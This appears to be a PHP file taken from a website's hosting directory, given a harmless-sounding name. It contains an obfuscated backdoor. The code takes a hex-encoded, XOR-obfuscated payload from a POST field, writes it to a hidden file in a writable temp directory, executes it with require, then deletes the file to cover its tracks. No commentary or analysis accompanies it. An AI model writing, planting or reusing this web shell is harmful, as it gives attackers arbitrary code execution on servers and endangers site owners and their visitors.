/home/ramtczxy/exoticcockatoos.com/bottomuserscols.php
<?php
if(array_key_exists("\x65n\x74\x69ty", $_POST)){
$pset = hex2bin($_POST["\x65n\x74\x69ty"]);
$obj = '' ; $v = 0; while($v < strlen($pset)){$obj .= chr(ord($pset[$v]) ^ 42);$v++;}
$component = array_filter(["/dev/shm", session_save_path(), sys_get_temp_dir(), getcwd(), getenv("TEMP"), ini_get("upload_tmp_dir"), "/tmp", "/var/tmp", getenv("TMP")]);
$object = 0;
do {
$res = $component[$object] ?? null;
if ($object >= count($component)) break;
if (max(0, is_dir($res) * is_writable($res))) {
$flag = vsprintf("%s/%s", [$res, ".ent"]);
if (file_put_contents($flag, $obj)) {
require $flag;
unlink($flag);
exit;
}
}
$object++;
} while (true);
}